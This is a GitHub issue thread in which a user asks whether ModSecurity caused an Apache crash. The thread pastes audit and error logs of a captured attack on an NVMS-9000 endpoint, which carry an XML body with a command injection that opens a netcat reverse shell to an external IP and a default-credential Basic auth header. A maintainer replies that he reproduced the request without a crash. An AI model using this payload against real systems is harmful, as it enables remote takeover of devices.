### ISSUE TITLE
crashed apache2 service maybe modsecurity could be a reason ?

### ISSUE THREAD

**Issue by naresh335** [coreruleset/coreruleset#1909]
### Describe the bug

An attacker target the server by sending XML in post request, and modsecurity tried to parse the same but failed to do so, eventually crashing the apache2 parent service & shutting down the web server completey

### Steps to reproduce

--07b23f43-A--
[19/Oct/2020:07:30:59 +0530] X4zzW38AAAEAAHU5qt0AAAAV 185.39.11.105 37454 10.1.1.76 80
--07b23f43-B--
POST /editBlackAndWhiteList HTTP/1.1
Accept-Encoding: identity
Content-Length: 586
Accept-Language: en-us
Host: 182.71.1.28:80
Accept: */*
User-Agent: ApiTool
Connection: close
Cache-Control: max-age=0
Content-Type: text/xml
Authorization: Basic YWRtaW46MTIzNDU2

--07b23f43-C--
<?xml version="1.0" encoding="utf-8"?><request version="1.0" systemType="NVMS-9000" clientType="WEB"><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type="filterTypeMode">refuse</filterType><filterList type="list"><itemType><addressType type="addressType"/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.39.11.105${IFS}37373${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>
--07b23f43-F--
HTTP/1.1 404 Not Found
Referrer-Policy: same-origin
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1

--07b23f43-E--
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>

--07b23f43-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "60"] [id "200002"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"]
Stopwatch: 1603072859069201 1240 (- - -)
Stopwatch2: 1603072859069201 1240; combined=132, p1=61, p2=66, p3=0, p4=0, p5=5, sr=0, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache
Engine-Mode: "DETECTION_ONLY"

--07b23f43-Z--

##apache last error log
-----------------------------------------------------------------------------------------------------------------------------------------
[Sun Oct 18 07:36:40.010599 2020] [mpm_event:notice] [pid 26039:tid 140632498993024] AH00489: Apache/2.4.18 (Ubuntu) OpenSSL/1.0.2g mod_fcgid/2.3.9 configured -- resuming normal operations
[Sun Oct 18 07:36:40.010625 2020] [core:notice] [pid 26039:tid 140632498993024] AH00094: Command line: '/usr/sbin/apache2'
[Mon Oct 19 07:37:21.050542 2020] [mpm_event:notice] [pid 26039:tid 140632498993024] AH00493: SIGUSR1 received.  Doing graceful restart
body.xml:1: parser error : xmlParseEntityRef: no name
Type>ip</addressType><ip>$(nc${IFS}185.39.11.105${IFS}37373${IFS}-e${IFS}$SHELL&
                                                                               ^
body.xml:1: parser error : xmlParseEntityRef: no name
Type>ip</addressType><ip>$(nc${IFS}185.39.11.105${IFS}37373${IFS}-e${IFS}$SHELL&
                                                                               ^
---------------------------------------------------------------------------------------------------------------------------------------------

### Expected behaviour

If parsing failed, it should avoid the xml parsing, and do not affect the apache service in any way

### Actual behaviour

Attacker sent an xml in post request causing apache2 service crash

### Additional context

I do think this could be an issue with apache2 wholetogether, in that case sorry in advance but please guide me as I'm not able to clearly depict what exactly happened.

### Your Environment

* CRS version (e.g., v3.2.0): v2.0 (comes with apt package manager)
* Paranoia level setting: --
* ModSecurity version (e.g., 2.9.3): 2.9.0-1
* Web Server and version (e.g., apache 2.4.41):  2.4.18-2ubuntu3.17
* Operating System and version: Ubuntu Server 16.04

**Comment by dune73** [comment]
Oops. This sounds grave. I have reproduced your request on ModSec 2.9.3 on Apache 2.4.46 and it does not crash.

Here is my error log:

```
body.xml:1: parser error : Document is empty
refuseallowipiprangemactruerefusetrueip$(nc${IFS}185.39.11.105${IFS}37373${IFS}-
^
[2020-10-19 07:57:31.668889] [-:error] 127.0.0.1:56800 X40qy@5LgxlbbGtD7AJAdwAAAAA [client 127.0.0.1] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "localhost"] [uri "/"] [unique_id "X40qy@5LgxlbbGtD7AJAdwAAAAA"]
```

This is exactly what I expected in this situation.

Now XML parsing is done within ModSecurity and this is the CRS bug tracker. CRS has nothing to do with this. So if you are sure that you are facing a bug and you can consistently crash apache this way - maybe because of the use of a particular older version - then please report to the ModSecurity project at https://github.com/spiderlabs/modsecurity.

I'm closing this.
